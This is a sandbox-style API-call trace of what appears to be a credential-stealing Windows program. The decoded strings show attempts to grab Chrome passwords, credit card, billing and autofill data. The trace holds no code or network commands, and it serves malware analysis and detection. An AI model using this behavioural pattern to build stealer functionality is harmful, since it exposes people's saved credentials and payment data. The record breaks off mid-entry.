WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x102 [0180.598] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e41940 [0180.598] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e65b30 [0180.599] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x400) returned 0x32e65510 [0180.599] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110068, lpBuffer=0x87fcd8, nSize=0x38, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x87fcd8*, lpNumberOfBytesRead=0x87fc58*=0x38) returned 1 [0180.599] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f3d0, lpBuffer=0x32e65b30, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e65b30*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65b30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0180.599] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234be70 [0180.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65b30, cbMultiByte=-1, lpWideCharStr=0x3234be70, cchWideChar=5 | out: lpWideCharStr="DPST") returned 5 [0180.599] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x613740, lpBuffer=0x32e65510, nSize=0x3ff, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e65510*, lpNumberOfBytesRead=0x87fc58*=0x3ff) returned 1 [0180.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65510, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0180.600] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x50) returned 0x32747620 [0180.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65510, cbMultiByte=-1, lpWideCharStr=0x32747620, cchWideChar=34 | out: lpWideCharStr="Failed to grab credit card data: ") returned 34 [0180.600] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f470, lpBuffer=0x32e41940, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e41940*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e41940, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1 [0180.600] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234bbf0 [0180.601] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e41940, cbMultiByte=-1, lpWideCharStr=0x3234bbf0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0180.601] SetEvent (hEvent=0x1b4) returned 1 [0180.606] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65b30 | out: hHeap=0x2150000) returned 1 [0180.607] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65510 | out: hHeap=0x2150000) returned 1 [0180.607] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41940 | out: hHeap=0x2150000) returned 1 [0180.607] GetTickCount () returned 0x2085788 [0180.607] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ffc0 [0180.607] GetTickCount () returned 0x2085788 [0180.607] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234be90 [0180.607] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x111a60, lpParameter=0x32e64b30, dwCreationFlags=0x0, lpThreadId=0x87fd8c | out: lpThreadId=0x87fd8c*=0x9ac) returned 0x774 [0180.608] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234be90 | out: hHeap=0x2150000) returned 1 [0180.608] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.614] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.615] GetTickCount () returned 0x208602d [0180.615] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c70 [0180.615] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x102 [0180.615] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e41940 [0180.615] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e65bd0 [0180.615] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x400) returned 0x32e65510 [0180.615] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110068, lpBuffer=0x87fcd8, nSize=0x38, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x87fcd8*, lpNumberOfBytesRead=0x87fc58*=0x38) returned 1 [0180.615] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f3d0, lpBuffer=0x32e65bd0, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e65bd0*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.615] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65bd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0180.615] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234b830 [0180.615] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65bd0, cbMultiByte=-1, lpWideCharStr=0x3234b830, cchWideChar=5 | out: lpWideCharStr="DPST") returned 5 [0180.615] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x613830, lpBuffer=0x32e65510, nSize=0x3ff, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e65510*, lpNumberOfBytesRead=0x87fc58*=0x3ff) returned 1 [0180.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65510, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 35 [0180.616] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x50) returned 0x32e65920 [0180.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65510, cbMultiByte=-1, lpWideCharStr=0x32e65920, cchWideChar=35 | out: lpWideCharStr="Failed to grab billing info data: ") returned 35 [0180.616] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f300, lpBuffer=0x32e41940, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e41940*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e41940, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1 [0180.616] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234b790 [0180.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e41940, cbMultiByte=-1, lpWideCharStr=0x3234b790, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0180.616] SetEvent (hEvent=0x1b4) returned 1 [0180.652] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65bd0 | out: hHeap=0x2150000) returned 1 [0180.652] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65510 | out: hHeap=0x2150000) returned 1 [0180.652] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41940 | out: hHeap=0x2150000) returned 1 [0180.652] GetTickCount () returned 0x208604d [0180.652] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e708c0 [0180.652] GetTickCount () returned 0x208604d [0180.652] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234b7f0 [0180.652] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x111a60, lpParameter=0x32e64c70, dwCreationFlags=0x0, lpThreadId=0x87fd8c | out: lpThreadId=0x87fd8c*=0xbc0) returned 0x78c [0180.653] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234b7f0 | out: hHeap=0x2150000) returned 1 [0180.653] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.662] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.679] GetTickCount () returned 0x2086902 [0180.679] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64e70 [0180.679] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x102 [0180.679] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e41940 [0180.679] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e65bd0 [0180.680] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x400) returned 0x32e65510 [0180.680] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110068, lpBuffer=0x87fcd8, nSize=0x38, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x87fcd8*, lpNumberOfBytesRead=0x87fc58*=0x38) returned 1 [0180.680] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f360, lpBuffer=0x32e65bd0, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e65bd0*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65bd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0180.680] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234b850 [0180.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65bd0, cbMultiByte=-1, lpWideCharStr=0x3234b850, cchWideChar=5 | out: lpWideCharStr="DEBG") returned 5 [0180.680] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x613950, lpBuffer=0x32e65510, nSize=0x3ff, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e65510*, lpNumberOfBytesRead=0x87fc58*=0x3ff) returned 1 [0180.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65510, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0180.680] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x60) returned 0x32e65c60 [0180.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65510, cbMultiByte=-1, lpWideCharStr=0x32e65c60, cchWideChar=45 | out: lpWideCharStr="Grab_Passwords_Chrome(): Can't open database") returned 45 [0180.680] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f410, lpBuffer=0x32e41940, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e41940*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e41940, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1 [0180.681] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234b890 [0180.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e41940, cbMultiByte=-1, lpWideCharStr=0x3234b890, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0180.681] SetEvent (hEvent=0x1b4) returned 1 [0180.682] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65bd0 | out: hHeap=0x2150000) returned 1 [0180.682] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65510 | out: hHeap=0x2150000) returned 1 [0180.682] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41940 | out: hHeap=0x2150000) returned 1 [0180.682] GetTickCount () returned 0x2086902 [0180.682] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e707a0 [0180.682] GetTickCount () returned 0x2086902 [0180.682] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234b8b0 [0180.682] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x111a60, lpParameter=0x32e64e70, dwCreationFlags=0x0, lpThreadId=0x87fd8c | out: lpThreadId=0x87fd8c*=0x127c) returned 0x7a4 [0180.683] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234b8b0 | out: hHeap=0x2150000) returned 1 [0180.683] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.697] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.710] GetTickCount () returned 0x20871b7 [0180.710] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e78320 [0180.710] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x102 [0180.710] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e41940 [0180.710] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e65bd0 [0180.710] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x400) returned 0x32e65510 [0180.710] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110068, lpBuffer=0x87fcd8, nSize=0x38, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x87fcd8*, lpNumberOfBytesRead=0x87fc58*=0x38) returned 1 [0180.711] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f280, lpBuffer=0x32e65bd0, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e65bd0*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65bd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0180.711] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234b8d0 [0180.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65bd0, cbMultiByte=-1, lpWideCharStr=0x3234b8d0, cchWideChar=5 | out: lpWideCharStr="DEBG") returned 5 [0180.711] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x615ea0, lpBuffer=0x32e65510, nSize=0x3ff, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e65510*, lpNumberOfBytesRead=0x87fc58*=0x3ff) returned 1 [0180.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65510, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 29 [0180.712] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x40) returned 0x32e65d80 [0180.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65510, cbMultiByte=-1, lpWideCharStr=0x32e65d80, cchWideChar=29 | out: lpWideCharStr="unable to open database file") returned 29 [0180.712] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f350, lpBuffer=0x32e41940, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e41940*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e41940, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1 [0180.713] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234b930 [0180.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e41940, cbMultiByte=-1, lpWideCharStr=0x3234b930, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0180.713] SetEvent (hEvent=0x1b4) returned 1 [0180.717] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65bd0 | out: hHeap=0x2150000) returned 1 [0180.717] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65510 | out: hHeap=0x2150000) returned 1 [0180.717] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41940 | out: hHeap=0x2150000) returned 1 [0180.717] GetTickCount () returned 0x20871b7 [0180.717] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70590 [0180.717] GetTickCount () returned 0x20871b7 [0180.717] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234b970 [0180.717] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x111a60, lpParameter=0x32e78320, dwCreationFlags=0x0, lpThreadId=0x87fd8c | out: lpThreadId=0x87fd8c*=0x3a4) returned 0x7bc [0180.718] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234b970 | out: hHeap=0x2150000) returned 1 [0180.718] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.725] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.726] GetTickCount () returned 0x2087a6c [0180.726] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e783a0 [0180.726] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x102 [0180.726] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e41940 [0180.726] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e65bd0 [0180.726] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x400) returned 0x32e65510 [0180.727] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110068, lpBuffer=0x87fcd8, nSize=0x38, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x87fcd8*, lpNumberOfBytesRead=0x87fc58*=0x38) returned 1 [0180.727] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f3b0, lpBuffer=0x32e65bd0, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e65bd0*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65bd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0180.727] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234b9b0 [0180.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65bd0, cbMultiByte=-1, lpWideCharStr=0x3234b9b0, cchWideChar=5 | out: lpWideCharStr="DPST") returned 5 [0180.727] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x615ea0, lpBuffer=0x32e65510, nSize=0x3ff, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e65510*, lpNumberOfBytesRead=0x87fc58*=0x3ff) returned 1 [0180.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65510, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0180.727] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x40) returned 0x32e65dd0 [0180.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65510, cbMultiByte=-1, lpWideCharStr=0x32e65dd0, cchWideChar=27 | out: lpWideCharStr="Failed to grab passwords: ") returned 27 [0180.727] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f410, lpBuffer=0x32e41940, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e41940*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e41940, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1 [0180.727] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234b990 [0180.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e41940, cbMultiByte=-1, lpWideCharStr=0x3234b990, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0180.727] SetEvent (hEvent=0x1b4) returned 1 [0180.730] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65bd0 | out: hHeap=0x2150000) returned 1 [0180.730] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65510 | out: hHeap=0x2150000) returned 1 [0180.730] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41940 | out: hHeap=0x2150000) returned 1 [0180.730] GetTickCount () returned 0x2087a6c [0180.731] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70650 [0180.731] GetTickCount () returned 0x2087a6c [0180.731] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234bdb0 [0180.731] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x111a60, lpParameter=0x32e783a0, dwCreationFlags=0x0, lpThreadId=0x87fd8c | out: lpThreadId=0x87fd8c*=0xbbc) returned 0x7c8 [0180.731] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bdb0 | out: hHeap=0x2150000) returned 1 [0180.731] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.748] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.764] GetTickCount () returned 0x2088322 [0180.764] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e78360 [0180.764] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x102 [0180.764] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e41940 [0180.765] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e65bd0 [0180.765] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x400) returned 0x32e65510 [0180.765] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110068, lpBuffer=0x87fcd8, nSize=0x38, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x87fcd8*, lpNumberOfBytesRead=0x87fc58*=0x38) returned 1 [0180.765] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f3c0, lpBuffer=0x32e65bd0, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e65bd0*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65bd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0180.765] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234b9d0 [0180.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65bd0, cbMultiByte=-1, lpWideCharStr=0x3234b9d0, cchWideChar=5 | out: lpWideCharStr="DPST") returned 5 [0180.765] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x615ca0, lpBuffer=0x32e65510, nSize=0x3ff, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e65510*, lpNumberOfBytesRead=0x87fc58*=0x3ff) returned 1 [0180.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65510, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0180.765] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x40) returned 0x32e50120 [0180.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65510, cbMultiByte=-1, lpWideCharStr=0x32e50120, cchWideChar=31 | out: lpWideCharStr="Failed to grab autofill data: ") returned 31 [0180.766] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f3b0, lpBuffer=0x32e41940, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e41940*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e41940, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1 [0180.766] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49e40 [0180.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e41940, cbMultiByte=-1, lpWideCharStr=0x32e49e40, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0180.766] SetEvent (hEvent=0x1b4) returned 1 [0180.770] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65bd0 | out: hHeap=0x2150000) returned 1 [0180.770] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65510 | out: hHeap=0x2150000) returned 1 [0180.770] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41940 | out: hHeap=0x2150000) returned 1 [0180.770] GetTickCount () returned 0x2088322 [0180.770] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e708f0 [0180.770] GetTickCount () returned 0x2088322 [0180.770] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49fa0 [0180.770] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x111a60, lpParameter=0x32e78360, dwCreationFlags=0x0, lpThreadId=0x87fd8c | out: lpThreadId=0x87fd8c*=0xed0) returned 0x7e0 [0180.771] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49fa0 | out: hHeap=0x2150000) returned 1 [0180.771] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.781] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.795] GetTickCount () returned 0x2088bd7 [0180.795] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e781a0 [0180.795] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x102 [0180.795] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e41940 [0180.795] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e65bd0 [0180.795] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x400) returned 0x32e805f0 [0180.796] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110068, lpBuffer=0x87fcd8, nSize=0x38, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x87fcd8*, lpNumberOfBytesRead=0x87fc58*=0x38) returned 1 [0180.796] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f3d0, lpBuffer=0x32e65bd0, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e65bd0*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65bd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0180.796] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e80fb0 [0180.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65bd0, cbMultiByte=-1, lpWideCharStr=0x32e80fb0, cchWideChar=5 | out: lpWideCharStr="DPST") returned 5 [0180.796] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x613860, lpBuffer=0x32e805f0, nSize=0x3ff, lpNumberOfBytesRead=0x87fc58 | out: 